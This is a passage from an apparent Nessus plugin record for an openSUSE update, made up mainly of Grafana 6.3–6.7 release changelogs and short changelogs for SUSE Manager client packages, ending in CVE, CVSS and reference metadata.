timestamps if parsing of time range as date fails.\n #21694, @jessetan\n\n - DashboardListPanel: Fixed problem with empty panel after\n going into edit mode (General folder filter being\n automatically added) . #23426, @torkelo\n\n - Data source: Handle datasource withCredentials option\n properly. #23380, @hvtuananh\n\n - Security: Fix annotation popup XSS vulnerability.\n #23813, @torkelo\n\n - Server: Exit Grafana with status code 0 if no error.\n #23312, @aknuds1\n\n - TablePanel: Fix XSS issue in header column rename\n (backport). #23814, @torkelo\n\n - Variables: Fixes error when setting adhoc variable\n values. #23580, @hugohaggmark\n\n - Update to version 6.7.2: (see installed changelog for\n the full list of changes)\n\n - BackendSrv: Adds config to response to fix issue for\n external plugins that used this property . #23032,\n @torkelo\n\n - Dashboard: Fixed issue with saving new dashboard after\n changing title . #23104, @dprokop\n\n - DataLinks: make sure we use the correct datapoint when\n dataset contains null value.. #22981, @mckn\n\n - Plugins: Fixed issue for plugins that imported dateMath\n util . #23069, @mckn\n\n - Security: Fix for dashboard snapshot original dashboard\n link could contain XSS vulnerability in url. #23254,\n @torkelo\n\n - Variables: Fixes issue with too many queries being\n issued for nested template variables after value change.\n #23220, @torkelo\n\n - Plugins: Expose promiseToDigest. #23249, @torkelo\n\n - Reporting (Enterprise): Fixes issue updating a report\n created by someone else\n\n - Update to 6.7.1: (see installed changelog for the full\n list of changes) Bug Fixes\n\n - Azure: Fixed dropdowns not showing current value.\n #22914, @torkelo\n\n - BackendSrv: only add content-type on POST, PUT requests.\n #22910, @hugohaggmark\n\n - Panels: Fixed size issue with panel internal size when\n exiting panel edit mode. #22912, @torkelo\n\n - Reporting: fixes migrations compatibility with mysql\n (Enterprise)\n\n - Reporting: Reduce default concurrency limit to 4\n (Enterprise)\n\n - Update to 6.7.0: (see installed changelog for the full\n list of changes) Bug Fixes\n\n - AngularPanels: Fixed inner height calculation for\n angular panels . #22796, @torkelo\n\n - BackendSrv: makes sure provided headers are correctly\n recognized and set. #22778, @hugohaggmark\n\n - Forms: Fix input suffix position (caret-down in Select)\n . #22780, @torkelo\n\n - Graphite: Fixed issue with query editor and next select\n metric now showing after selecting metric node . #22856,\n @torkelo\n\n - Rich History: UX adjustments and fixes. #22729,\n @ivanahuckova\n\n - Update to 6.7.0-beta1: Breaking changes\n\n - Slack: Removed Mention setting and instead introduce\n Mention Users, Mention Groups, and Mention Channel. The\n first two settings require user and group IDs,\n respectively. This change was necessary because the way\n of mentioning via the Slack API changed and mentions in\n Slack notifications no longer worked.\n\n - Alerting: Reverts the behavior of diff and percent_diff\n to not always be absolute. Something we introduced by\n mistake in 6.1.0. Alerting now support diff(),\n diff_abs(), percent_diff() and percent_diff_abs().\n #21338\n\n - Notice about changes in backendSrv for plugin authors In\n our mission to migrate away from AngularJS to React we\n have removed all AngularJS dependencies in the core data\n retrieval service backendSrv. Removing the AngularJS\n dependencies in backendSrv has the unfortunate side\n effect of AngularJS digest no longer being triggered for\n any request made with backendSrv. Because of this,\n external plugins using backendSrv directly may suffer\n from strange behaviour in the UI. To remedy this issue,\n as a plugin author you need to trigger the digest after\n a direct call to backendSrv. Bug Fixes API: Fix redirect\n issues. #22285, @papagian Alerting: Don't include\n image_url field with Slack message if empty. #22372,\n @aknuds1 Alerting: Fixed bad background color for\n default notifications in alert tab . #22660, @krvajal\n Annotations: In table panel when setting transform to\n annotation, they will now show up right away without a\n manual refresh. #22323, @krvajal Azure Monitor: Fix app\n insights source to allow for new __timeFrom and\n __timeTo. #21879, @ChadNedzlek BackendSrv: Fixes POST\n body for form data. #21714, @hugohaggmark CloudWatch:\n Credentials cache invalidation fix. #22473, @sunker\n CloudWatch: Expand alias variables when query yields no\n result. #22695, @sunker Dashboard: Fix bug with NaN in\n alerting. #22053, @a-melnyk Explore: Fix display of\n multiline logs in log panel and explore. #22057,\n @thomasdraebing Heatmap: Legend color range is incorrect\n when using custom min/max. #21748, @sv5d Security: Fixed\n XSS issue in dashboard history diff . #22680, @torkelo\n StatPanel: Fixes base color is being used for null\n values . #22646, @torkelo\n\n - Update to version 6.6.2: (see installed changelog for\n the full list of changes)\n\n - Update to version 6.6.1: (see installed changelog for\n the full list of changes)\n\n - Update to version 6.6.0: (see installed changelog for\n the full list of changes)\n\n - Update to version 6.5.3: (see installed changelog for\n the full list of changes)\n\n - Update to version 6.5.2: (see installed changelog for\n the full list of changes)\n\n - Update to version 6.5.1: (see installed changelog for\n the full list of changes)\n\n - Update to version 6.5.0 (see installed changelog for the\n full list of changes)\n\n - Update to version 6.4.5 :\n\n - Create version 6.4.5\n\n - CloudWatch: Fix high CPU load (#20579)\n\n - Add obs-service-go_modules to download required modules\n into vendor.tar.gz\n\n - Adjusted spec file to use vendor.tar.gz\n\n - Adjusted Makefile to work with new filenames\n\n - BuildRequire go1.14\n\n - Update to version 6.4.4 :\n\n - DataLinks: Fix blur issues. #19883, @aocenas\n\n - Docker: Makes it possible to parse timezones in the\n docker image. #20081, @xlson\n\n - LDAP: All LDAP servers should be tried even if one of\n them returns a connection error. #20077, @jongyllen\n\n - LDAP: No longer shows incorrectly matching groups based\n on role in debug page. #20018, @xlson\n\n - Singlestat: Fix no data / null value mapping . #19951,\n @ryantxu\n\n - Revert the spec file and make script\n\n - Remove PhantomJS dependency\n\n - Update to 6.4.3\n\n - Bug Fixes\n\n - Alerting: All notification channels should send even if\n one fails to send. #19807, @jan25\n\n - AzureMonitor: Fix slate interference with dropdowns.\n #19799, @aocenas\n\n - ContextMenu: make ContextMenu positioning aware of the\n viewport width. #19699, @krvajal\n\n - DataLinks: Fix context menu not showing in\n singlestat-ish visualisations. #19809, @dprokop\n\n - DataLinks: Fix url field not releasing focus. #19804,\n @aocenas\n\n - Datasource: Fixes clicking outside of some query editors\n required 2 clicks. #19822, @aocenas\n\n - Panels: Fixes default tab for visualizations without\n Queries Tab. #19803, @hugohaggmark\n\n - Singlestat: Fixed issue with mapping null to text.\n #19689, @torkelo\n\n - @grafana/toolkit: Don't fail plugin creation when git\n user.name config is not set. #19821, @dprokop\n\n - @grafana/toolkit: TSLint line number off by 1. #19782,\n @fredwangwang\n\n - Update to 6.4.2\n\n - Bug Fixes\n\n - CloudWatch: Changes incorrect dimension wmlid to wlmid .\n #19679, @ATTron\n\n - Grafana Image Renderer: Fixes plugin page. #19664,\n @hugohaggmark\n\n - Graph: Fixes auto decimals logic for y axis ticks that\n results in too many decimals for high values. #19618,\n @torkelo\n\n - Graph: Switching to series mode should re-render graph.\n #19623, @torkelo\n\n - Loki: Fix autocomplete on label values. #19579, @aocenas\n\n - Loki: Removes live option for logs panel. #19533,\n @davkal\n\n - Profile: Fix issue with user profile not showing more\n than sessions sessions in some cases. #19578,\n @huynhsamha\n\n - Prometheus: Fixes so results in Panel always are sorted\n by query order. #19597, @hugohaggmark\n\n - ShareQuery: Fixed issue when using -- Dashboard --\n datasource (to share query result) when dashboard had\n rows. #19610, @torkelo\n\n - Show SAML login button if SAML is enabled. #19591,\n @papagian\n\n - SingleStat: Fixes postfix/prefix usage. #19687,\n @hugohaggmark\n\n - Table: Proper handling of json data with dataframes.\n #19596, @marefr\n\n - Units: Fixed wrong id for Terabits/sec. #19611,\n @andreaslangnevyjel\n\n - Changes from 6.4.1\n\n - Bug Fixes\n\n - Provisioning: Fixed issue where empty nested keys in\n YAML provisioning caused a server crash, #19547\n\n - ImageRendering: Fixed issue with image rendering in\n enterprise build (Enterprise)\n\n - Reporting: Fixed issue with reporting service when STMP\n was disabled (Enterprise).\n\n - Changes from 6.4.0\n\n - Features / Enhancements\n\n - Build: Upgrade go to 1.12.10. #19499, @marefr\n\n - DataLinks: Suggestions menu improvements. #19396,\n @dprokop\n\n - Explore: Take root_url setting into account when\n redirecting from dashboard to explore. #19447,\n @ivanahuckova\n\n - Explore: Update broken link to logql docs. #19510,\n @ivanahuckova\n\n - Logs: Adds Logs Panel as a visualization. #19504,\n @davkal\n\n - Bug Fixes\n\n - CLI: Fix version selection for plugin install. #19498,\n @aocenas\n\n - Graph: Fixes minor issue with series override color\n picker and custom color . #19516, @torkelo\n\n - Changes from 6.4.0 Beta 2\n\n - Features / Enhancements\n\n - Azure Monitor: Remove support for cross resource queries\n (#19115)'. #19346, @sunker\n\n - Docker: Upgrade packages to resolve reported\n vulnerabilities. #19188, @marefr\n\n - Graphite: Time range expansion reduced from 1 minute to\n 1 second. #19246, @torkelo\n\n - grafana/toolkit: Add plugin creation task. #19207,\n @dprokop\n\n - Bug Fixes\n\n - Alerting: Prevents creating alerts from unsupported\n queries. #19250, @hugohaggmark\n\n - Alerting: Truncate PagerDuty summary when greater than\n 1024 characters. #18730, @nvllsvm\n\n - Cloudwatch: Fix autocomplete for Gamelift dimensions.\n #19146, @kevinpz\n\n - Dashboard: Fix export for sharing when panels use\n default data source. #19315, @torkelo\n\n - Database: Rewrite system statistics query to perform\n better. #19178, @papagian\n\n - Gauge/BarGauge: Fix issue with [object Object] in titles\n . #19217, @ryantxu\n\n - MSSQL: Revert usage of new connectionstring format\n introduced by #18384. #19203, @marefr\n\n - Multi-LDAP: Do not fail-fast on invalid credentials.\n #19261, @gotjosh\n\n - MySQL, Postgres, MSSQL: Fix validating query with\n template variables in alert . #19237, @marefr\n\n - MySQL, Postgres: Update raw sql when query builder\n updates. #19209, @marefr\n\n - MySQL: Limit datasource error details returned from the\n backend. #19373, @marefr\n\n - Changes from 6.4.0 Beta 1\n\n - Features / Enhancements\n\n - API: Readonly datasources should not be created via the\n API. #19006, @papagian\n\n - Alerting: Include configured AlertRuleTags in Webhooks\n notifier. #18233, @dominic-miglar\n\n - Annotations: Add annotations support to Loki. #18949,\n @aocenas\n\n - Annotations: Use a single row to represent a region.\n #17673, @ryantxu\n\n - Auth: Allow inviting existing users when login form is\n disabled. #19048, @548017\n\n - Azure Monitor: Add support for cross resource queries.\n #19115, @sunker\n\n - CLI: Allow installing custom binary plugins. #17551,\n @aocenas\n\n - Dashboard: Adds Logs Panel (alpha) as visualization\n option for Dashboards. #18641, @hugohaggmark\n\n - Dashboard: Reuse query results between panels . #16660,\n @ryantxu\n\n - Dashboard: Set time to to 23:59:59 when setting To time\n using calendar. #18595, @simPod\n\n - DataLinks: Add DataLinks support to Gauge, BarGauge and\n SingleStat2 panel. #18605, @ryantxu\n\n - DataLinks: Enable access to labels & field names.\n #18918, @torkelo\n\n - DataLinks: Enable multiple data links per panel. #18434,\n @dprokop\n\n - Docker: switch docker image to alpine base with\n phantomjs support. #18468, @DanCech\n\n - Elasticsearch: allow templating queries to order by\n doc_count. #18870, @hackery\n\n - Explore: Add throttling when doing live queries. #19085,\n @aocenas\n\n - Explore: Adds ability to go back to dashboard,\n optionally with query changes. #17982, @kaydelaney\n\n - Explore: Reduce default time range to last hour. #18212,\n @davkal\n\n - Gauge/BarGauge: Support decimals for min/max. #18368,\n @ryantxu\n\n - Graph: New series override transform constant that\n renders a single point as a line across the whole graph.\n #19102, @davkal\n\n - Image rendering: Add deprecation warning when PhantomJS\n is used for rendering images. #18933, @papagian\n\n - InfluxDB: Enable interpolation within ad-hoc filter\n values. #18077, @kvc-code\n\n - LDAP: Allow an user to be synchronized against LDAP.\n #18976, @gotjosh\n\n - Ldap: Add ldap debug page. #18759, @peterholmberg\n\n - Loki: Remove prefetching of default label values.\n #18213, @davkal\n\n - Metrics: Add failed alert notifications metric. #18089,\n @koorgoo\n\n - OAuth: Support JMES path lookup when retrieving user\n email. #14683, @bobmshannon\n\n - OAuth: return GitLab groups as a part of user info\n (enable team sync). #18388, @alexanderzobnin\n\n - Panels: Add unit for electrical charge - ampere-hour.\n #18950, @anirudh-ramesh\n\n - Plugin: AzureMonitor - Reapply MetricNamespace support.\n #17282, @raphaelquati\n\n - Plugins: better warning when plugins fail to load.\n #18671, @ryantxu\n\n - Postgres: Add support for scram sha 256 authentication.\n #18397, @nonamef\n\n - RemoteCache: Support SSL with Redis. #18511, @kylebrandt\n\n - SingleStat: The gauge option in now disabled/hidden\n (unless it's an old panel with it already enabled) .\n #18610, @ryantxu\n\n - Stackdriver: Add extra alignment period options. #18909,\n @sunker\n\n - Units: Add South African Rand (ZAR) to currencies.\n #18893, @jeteon\n\n - Units: Adding T,P,E,Z,and Y bytes. #18706, @chiqomar\n\n - Bug Fixes\n\n - Alerting: Notification is sent when state changes from\n no_data to ok. #18920, @papagian\n\n - Alerting: fix duplicate alert states when the alert\n fails to save to the database. #18216, @kylebrandt\n\n - Alerting: fix response popover prompt when add\n notification channels. #18967, @lzdw\n\n - CloudWatch: Fix alerting for queries with Id (using\n GetMetricData). #17899, @alex-berger\n\n - Explore: Fix auto completion on label values for Loki.\n #18988, @aocenas\n\n - Explore: Fixes crash using back button with a zoomed in\n graph. #19122, @hugohaggmark\n\n - Explore: Fixes so queries in Explore are only run if\n Graph/Table is shown. #19000, @hugohaggmark\n\n - MSSQL: Change connectionstring to URL format to fix\n using passwords with semicolon. #18384, @Russiancold\n\n - MSSQL: Fix memory leak when debug enabled. #19049,\n @briangann\n\n - Provisioning: Allow escaping literal '$' with '$$' in\n configs to avoid interpolation. #18045, @kylebrandt\n\n - TimePicker: Fixes hiding time picker dropdown in\n FireFox. #19154, @hugohaggmark\n\n - Breaking changes\n\n + Annotations There are some breaking changes in the\n annotations HTTP API for region annotations. Region\n annotations are now represented using a single event\n instead of two separate events. Check breaking changes\n in HTTP API below and HTTP API documentation for more\n details.\n\n + Docker Grafana is now using Alpine 3.10 as docker base\n image.\n\n + HTTP API\n\n - GET /api/alert-notifications now requires at least\n editor access. New /api/alert-notifications/lookup\n returns less information than /api/alert-notifications\n and can be access by any authenticated user.\n\n - GET /api/alert-notifiers now requires at least editor\n access\n\n - GET /api/org/users now requires org admin role. New\n /api/org/users/lookup returns less information than\n /api/org/users and can be access by users that are org\n admins, admin in any folder or admin of any team.\n\n - GET /api/annotations no longer returns regionId\n property.\n\n - POST /api/annotations no longer supports isRegion\n property.\n\n - PUT /api/annotations/:id no longer supports isRegion\n property.\n\n - PATCH /api/annotations/:id no longer supports isRegion\n property.\n\n - DELETE /api/annotations/region/:id has been removed.\n\n - Deprecation notes\n\n + PhantomJS\n\n - PhantomJS, which is used for rendering images of\n dashboards and panels, is deprecated and will be removed\n in a future Grafana release. A deprecation warning will\n from now on be logged when Grafana starts up if\n PhantomJS is in use. Please consider migrating from\n PhantomJS to the Grafana Image Renderer plugin.\n\n - Changes from 6.3.6\n\n - Features / Enhancements\n\n - Metrics: Adds setting for turning off total stats\n metrics. #19142, @marefr\n\n - Bug Fixes\n\n - Database: Rewrite system statistics query to perform\n better. #19178, @papagian\n\n - Explore: Fixes error when switching from prometheus to\n loki data sources. #18599, @kaydelaney\n\n - Rebase package spec. Use mostly from fedora, fix suse\n specified things and fix some errors.\n\n - Add missing directories provisioning/datasources and\n provisioning/notifiers and sample.yaml as described in\n packaging/rpm/control from upstream. Missing directories\n are shown in logfiles.\n\n - Version 6.3.5\n\n - Upgrades\n\n + Build: Upgrade to go 1.12.9.\n\n - Bug Fixes\n\n + Dashboard: Fixes dashboards init failed loading error\n for dashboards with panel links that had missing\n properties.\n\n + Editor: Fixes issue where only entire lines were being\n copied.\n\n + Explore: Fixes query field layout in splitted view for\n Safari browsers.\n\n + LDAP: multildap + ldap integration.\n\n + Profile/UserAdmin: Fix for user agent parser crashes\n grafana-server on 32-bit builds.\n\n + Prometheus: Prevents panel editor crash when switching\n to Prometheus datasource.\n\n + Prometheus: Changes brace-insertion behavior to be less\n annoying.\n\n - Version 6.3.4\n\n - Security: CVE-2019-15043 - Parts of the HTTP API allow\n unauthenticated use.\n\n - Version 6.3.3\n\n - Bug Fixes\n\n + Annotations: Fix failing annotation query when time\n series query is cancelled. #18532 1, @dprokop 1\n\n + Auth: Do not set SameSite cookie attribute if\n cookie_samesite is none. #18462 1, @papagian 3\n\n + DataLinks: Apply scoped variables to data links\n correctly. #18454 1, @dprokop 1\n\n + DataLinks: Respect timezone when displaying\n datapoint&rsquo;s timestamp in graph context menu.\n #18461 2, @dprokop 1\n\n + DataLinks: Use datapoint timestamp correctly when\n interpolating variables. #18459 1, @dprokop 1\n\n + Explore: Fix loading error for empty queries. #18488 1,\n @davkal\n\n + Graph: Fixes legend issue clicking on series line icon\n and issue with horizontal scrollbar being visible on\n windows. #18563 1, @torkelo 2\n\n + Graphite: Avoid glob of single-value array variables .\n #18420, @gotjosh\n\n + Prometheus: Fix queries with label_replace remove the $1\n match when loading query editor. #18480 5, @hugohaggmark\n 3\n\n + Prometheus: More consistently allows for multi-line\n queries in editor. #18362 2, @kaydelaney 2\n\n + TimeSeries: Assume values are all numbers. #18540 4,\n @ryantxu\n\n - Version 6.3.2\n\n - Bug Fixes\n\n + Gauge/BarGauge: Fixes issue with losts thresholds and\n issue loading Gauge with avg stat. #18375 12\n\n - Version 6.3.1\n\n - Bug Fixes\n\n + PanelLinks: Fix crash issue Gauge & Bar Gauge for panels\n with panel links (drill down links). #18430 2\n\n - Version 6.3.0\n\n - Features / Enhancements\n\n + OAuth: Do not set SameSite OAuth cookie if\n cookie_samesite is None. #18392 4, @papagian 3\n\n + Auth Proxy: Include additional headers as part of the\n cache key. #18298 6, @gotjosh\n\n + Build grafana images consistently. #18224 12,\n @hassanfarid\n\n + Docs: SAML. #18069 11, @gotjosh\n\n + Permissions: Show plugins in nav for non admin users but\n hide plugin configuration. #18234 1, @aocenas\n\n + TimePicker: Increase max height of quick range dropdown.\n #18247 2, @torkelo 2\n\n + Alerting: Add tags to alert rules. #10989 13, @Thib17 1\n\n + Alerting: Attempt to send email notifications to all\n given email addresses. #16881 1, @zhulongcheng\n\n + Alerting: Improve alert rule testing. #16286 2, @marefr\n\n + Alerting: Support for configuring content field for\n Discord alert notifier. #17017 2, @jan25\n\n + Alertmanager: Replace illegal chars with underscore in\n label names. #17002 5, @bergquist 1\n\n + Auth: Allow expiration of API keys. #17678, @papagian 3\n\n + Auth: Return device, os and browser when listing user\n auth tokens in HTTP API. #17504, @shavonn 1\n\n + Auth: Support list and revoke of user auth tokens in UI.\n #17434 2, @shavonn 1\n\n + AzureMonitor: change clashing built-in Grafana\n variables/macro names for Azure Logs. #17140, @shavonn 1\n\n + CloudWatch: Made region visible for AWS Cloudwatch\n Expressions. #17243 2, @utkarshcmu\n\n + Cloudwatch: Add AWS DocDB metrics. #17241, @utkarshcmu\n\n + Dashboard: Use timezone dashboard setting when exporting\n to CSV. #18002 1, @dehrax\n\n + Data links. #17267 11, @torkelo 2\n\n + Docker: Switch base image to ubuntu:latest from\n debian:stretch to avoid security issues&hellip; #17066\n 5, @bergquist 1\n\n + Elasticsearch: Support for visualizing logs in Explore .\n #17605 7, @marefr\n\n + Explore: Adds Live option for supported datasources.\n #17062 1, @hugohaggmark 3\n\n + Explore: Adds orgId to URL for sharing purposes. #17895\n 1, @kaydelaney 2\n\n + Explore: Adds support for new loki &lsquo;start&rsquo;\n and &lsquo;end&rsquo; params for labels endpoint.\n #17512, @kaydelaney 2\n\n + Explore: Adds support for toggling raw query mode in\n explore. #17870, @kaydelaney 2\n\n + Explore: Allow switching between metrics and logs .\n #16959 2, @marefr\n\n + Explore: Combines the timestamp and local time columns\n into one. #17775, @hugohaggmark 3\n\n + Explore: Display log lines context . #17097, @dprokop 1\n\n + Explore: Don&rsquo;t parse log levels if provided by\n field or label. #17180 1, @marefr\n\n + Explore: Improves performance of Logs element by\n limiting re-rendering. #17685, @kaydelaney 2\n\n + Explore: Support for new LogQL filtering syntax. #16674\n 4, @davkal\n\n + Explore: Use new TimePicker from Grafana/UI. #17793,\n @hugohaggmark 3\n\n + Explore: handle newlines in LogRow Highlighter. #17425,\n @rrfeng 1\n\n + Graph: Added new fill gradient option. #17528 3,\n @torkelo 2\n\n + GraphPanel: Don&rsquo;t sort series when legend table &\n sort column is not visible . #17095, @shavonn 1\n\n + InfluxDB: Support for visualizing logs in Explore.\n #17450 9, @hugohaggmark 3\n\n + Logging: Login and Logout actions (#17760). #17883 1,\n @ATTron\n\n + Logging: Move log package to pkg/infra. #17023,\n @zhulongcheng\n\n + Metrics: Expose stats about roles as metrics. #17469 2,\n @bergquist 1\n\n + MySQL/Postgres/MSSQL: Add parsing for day, weeks and\n year intervals in macros. #13086 6, @bernardd\n\n + MySQL: Add support for periodically reloading client\n certs. #14892, @tpetr\n\n + Plugins: replace dataFormats list with skipDataQuery\n flag in plugin.json. #16984, @ryantxu\n\n + Prometheus: Take timezone into account for step\n alignment. #17477, @fxmiii\n\n + Prometheus: Use overridden panel range for $__range\n instead of dashboard range. #17352, @patrick246\n\n + Prometheus: added time range filter to series labels\n query. #16851 3, @FUSAKLA\n\n + Provisioning: Support folder that doesn&rsquo;t exist\n yet in dashboard provisioning. #17407 1, @Nexucis\n\n + Refresh picker: Handle empty intervals. #17585 1,\n @dehrax\n\n + Singlestat: Add y min/max config to singlestat\n sparklines. #17527 4, @pitr\n\n + Snapshot: use given key and deleteKey. #16876,\n @zhulongcheng\n\n + Templating: Correctly display __text in multi-value\n variable after page reload. #17840 1, @EduardSergeev\n\n + Templating: Support selecting all filtered values of a\n multi-value variable. #16873 2, @r66ad\n\n + Tracing: allow propagation with Zipkin headers. #17009\n 4, @jrockway\n\n + Users: Disable users removed from LDAP. #16820 2,\n @alexanderzobnin\n\n - Bug Fixes\n\n + PanelLinks: Fix render issue when there is no panel\n description. #18408 3, @dehrax\n\n + OAuth: Fix &ldquo;missing saved state&rdquo; OAuth login\n failure due to SameSite cookie policy. #18332 1,\n @papagian 3\n\n + cli: fix for recognizing when in dev mode&hellip;\n #18334, @xlson\n\n + DataLinks: Fixes incorrect interpolation of\n $(__series_name) . #18251 1, @torkelo 2\n\n + Loki: Display live tailed logs in correct order in\n Explore. #18031 3, @kaydelaney 2\n\n + PhantomJS: Fixes rendering on Debian Buster. #18162 2,\n @xlson\n\n + TimePicker: Fixed style issue for custom range popover.\n #18244, @torkelo 2\n\n + Timerange: Fixes a bug where custom time ranges\n didn&rsquo;t respect UTC. #18248 1, @kaydelaney 2\n\n + remote_cache: Fix redis connstr parsing. #18204 1,\n @mblaschke\n\n + AddPanel: Fix issue when removing moved add panel widget\n . #17659 2, @dehrax\n\n + CLI: Fix encrypt-datasource-passwords fails with sql\n error. #18014, @marefr\n\n + Elasticsearch: Fix default max concurrent shard\n requests. #17770 4, @marefr\n\n + Explore: Fix browsing back to dashboard panel. #17061,\n @jschill\n\n + Explore: Fix filter by series level in logs graph.\n #17798, @marefr\n\n + Explore: Fix issues when loading and both graph/table\n are collapsed. #17113, @marefr\n\n + Explore: Fix selection/copy of log lines. #17121,\n @marefr\n\n + Fix: Wrap value of multi variable in array when coming\n from URL. #16992 1, @aocenas\n\n + Frontend: Fix for Json tree component not working.\n #17608, @srid12\n\n + Graphite: Fix for issue with alias function being moved\n last. #17791, @torkelo 2\n\n + Graphite: Fixes issue with seriesByTag & function with\n variable param. #17795, @torkelo 2\n\n + Graphite: use POST for /metrics/find requests. #17814 2,\n @papagian 3\n\n + HTTP Server: Serve Grafana with a custom URL path\n prefix. #17048 6, @jan25\n\n + InfluxDB: Fixes single quotes are not escaped in label\n value filters. #17398 1, @Panzki\n\n + Prometheus: Correctly escape &lsquo;|&rsquo; literals in\n interpolated PromQL variables. #16932, @Limess\n\n + Prometheus: Fix when adding label for metrics which\n contains colons in Explore. #16760, @tolwi\n\n + SinglestatPanel: Remove background color when value\n turns null. #17552 1, @druggieri\n\n - Make phantomjs dependency configurable\n\n - Create plugin directory and clean up (create in\n %install, add to %files) handling of /var/lib/grafana/*\n and\n\nkoan :\n\n - Calculate relative path for kernel and inited when\n generating grub entry (bsc#1170231)\n\n - Fix os-release version detection for SUSE\n\nmgr-cfg :\n\n - Remove commented code in test files\n\n - Replace spacewalk-usix with uyuni-common-libs\n\n - Bump version to 4.1.0 (bsc#1154940)\n\n - Add mgr manpage links\n\nmgr-custom-info :\n\n - Bump version to 4.1.0 (bsc#1154940)\n\nmgr-daemon :\n\n - Bump version to 4.1.0 (bsc#1154940)\n\n - Fix systemd timer configuration on SLE12 (bsc#1142038)\n\nmgr-osad :\n\n - Separate osa-dispatcher and jabberd so it can be\n disabled independently\n\n - Replace spacewalk-usix with uyuni-common-libs\n\n - Bump version to 4.1.0 (bsc#1154940)\n\n - Move /usr/share/rhn/config-defaults to uyuni-base-common\n\n - Require uyuni-base-common for /etc/rhn (for\n osa-dispatcher)\n\n - Ensure bytes type when using hashlib to avoid traceback\n (bsc#1138822)\n\nmgr-push :\n\n - Replace spacewalk-usix and spacewalk-backend-libs with\n uyuni-common-libs\n\n - Bump version to 4.1.0 (bsc#1154940)\n\nmgr-virtualization :\n\n - Replace spacewalk-usix with uyuni-common-libs\n\n - Bump version to 4.1.0 (bsc#1154940)\n\n - Fix mgr-virtualization timer\n\nrhnlib :\n\n - Fix building\n\n - Fix malformed XML response when data contains non-ASCII\n chars (bsc#1154968)\n\n - Bump version to 4.1.0 (bsc#1154940)\n\n - Fix bootstrapping SLE11SP4 trad client with SSL enabled\n (bsc#1148177)\n\nspacecmd :\n\n - Only report real error, not result (bsc#1171687)\n\n - Use defined return values for spacecmd methods so\n scripts can check for failure (bsc#1171687)\n\n - Disable globbing for api subcommand to allow wildcards\n in filter settings (bsc#1163871)\n\n - Bugfix: attempt to purge SSM when it is empty\n (bsc#1155372)\n\n - Bump version to 4.1.0 (bsc#1154940)\n\n - Prevent error when piping stdout in Python 2\n (bsc#1153090)\n\n - Java api expects content as encoded string instead of\n encoded bytes like before (bsc#1153277)\n\n - Enable building and installing for Ubuntu 16.04 and\n Ubuntu 18.04\n\n - Add unit test for schedule, errata, user, utils, misc,\n configchannel and kickstart modules\n\n - Multiple minor bugfixes alongside the unit tests\n\n - Bugfix: referenced variable before assignment.\n\n - Add unit test for report, package, org, repo and group\n\nspacewalk-client-tools :\n\n - Add workaround for uptime overflow to\n spacewalk-update-status as well (bsc#1165921)\n\n - Spell correctly 'successful' and 'successfully'\n\n - Skip dmidecode data on aarch64 to prevent coredump\n (bsc#1113160)\n\n - Replace spacewalk-usix with uyuni-common-libs\n\n - Return a non-zero exit status on errors in rhn_check\n\n - Bump version to 4.1.0 (bsc#1154940)\n\n - Make a explicit requirement to systemd for\n spacewalk-client-tools when rhnsd timer is installed\n\nspacewalk-koan :\n\n - Bump version to 4.1.0 (bsc#1154940)\n\n - Require commands we use in merge-rd.sh\n\nspacewalk-oscap :\n\n - Bump version to 4.1.0 (bsc#1154940)\n\nspacewalk-remote-utils :\n\n - Update spacewalk-create-channel with RHEL 7.7 channel\n definitions\n\n - Bump version to 4.1.0 (bsc#1154940)\n\nsupportutils-plugin-susemanager-client :\n\n - Bump version to 4.1.0 (bsc#1154940)\n\nsuseRegisterInfo :\n\n - SuseRegisterInfo only needs perl-base, not full perl\n (bsc#1168310)\n\n - Bump version to 4.1.0 (bsc#1154940)\n\nzypp-plugin-spacewalk :\n\n - 1.0.7\n\n - Prevent issue with non-ASCII characters in Python 2\n systems (bsc#1172462)\n\nThis update was imported from the SUSE:SLE-15:Update update project.", "published": "2020-07-28T00:00:00", "modified": "2020-07-28T00:00:00", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:P"}, "cvss2": {}, "cvss3": {"score": 8.2, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:H"}, "href": "https://www.tenable.com/plugins/nessus/139022", "reporter": "This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["https://bugzilla.opensuse.org/show_bug.cgi?id=1154940", "https://bugzilla.opensuse.org/show_bug.cgi?id=1113160", "https://bugzilla.opensuse.org/show_bug.cgi?id=1148177", "https://bugzilla.opensuse.org/show_bug.cgi?id=1170557", "https://bugzilla.opensuse.org/show_bug.cgi?id=1171687", "https://bugzilla.opensuse.org/show_bug.cgi?id=1155372", "https://bugzilla.opensuse.org/show_bug.cgi?id=1153277", "https://bugzilla.opensuse.org/show_bug.cgi?id=1168310", "https://bugzilla.opensuse.org/show_bug.cgi?id=1170824", "https://bugzilla.opensuse.org/show_bug.cgi?id=1138822", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10215", "https://bugzilla.opensuse.org/show_bug.cgi?id=1170231", "https://bugzilla.opensuse.org/show_bug.cgi?id=1154968", "https://bugzilla.opensuse.org/show_bug.cgi?id=1163871", "https://bugzilla.opensuse.org/show_bug.cgi?id=1172462", "https://bugzilla.opensuse.org/show_bug.cgi?id=1165921", "https://bugzilla.opensuse.org/show_bug.cgi?id=1142038", "https://bugzilla.opensuse.org/show_bug.cgi?id=1153090"], "cvelist": ["CVE-2020-12245", "CVE-2019-15043", "CVE-2020-13379", "CVE-2019-10215"], "immutableFields": [], "lastseen": "2020-09-14T17:07:20", "history": [], "viewCount": 4, "enchantments": {"dependencies": {"modified": "2020-09-14T17:07:20", "references": [{"idList": ["AKB:A4C40AA9-050B-4FF2-A029-BE3ADC6857CA", "AKB:72725B13-8444-4A5A-B4E8-71CF57FF5C25"], "type": "attackerkb"}, {"idList": ["1337DAY-ID-34640"], "type": "zdt"}, {"idList": ["OPENSUSE-SU-2020:1611-1", "OPENSUSE-SU-2020:0892-1", "OPENSUSE-SU-2020:1105-1", "OPENSUSE-SU-2020:1646-1"], "type": "suse"}, {"idList": ["SMNTC-110352"], "type": "symantec"}, {"idList": ["RHSA-2020:2792", "RHSA-2020:2641", "RHSA-2021:1518", "RHSA-2020:5599", "RHSA-2020:2861", "RHSA-2021:0083", "RHSA-2020:2796", "RHSA-2020:2676", "RHSA-2020:1659", "RHSA-2019:3771"], "type": "redhat"}, {"idList": ["OPENVAS:1361412562310876775", "OPENVAS:1361412562310853237", "OPENVAS:1361412562310144077", "OPENVAS:1361412562310877981", "OPENVAS:1361412562310142855", 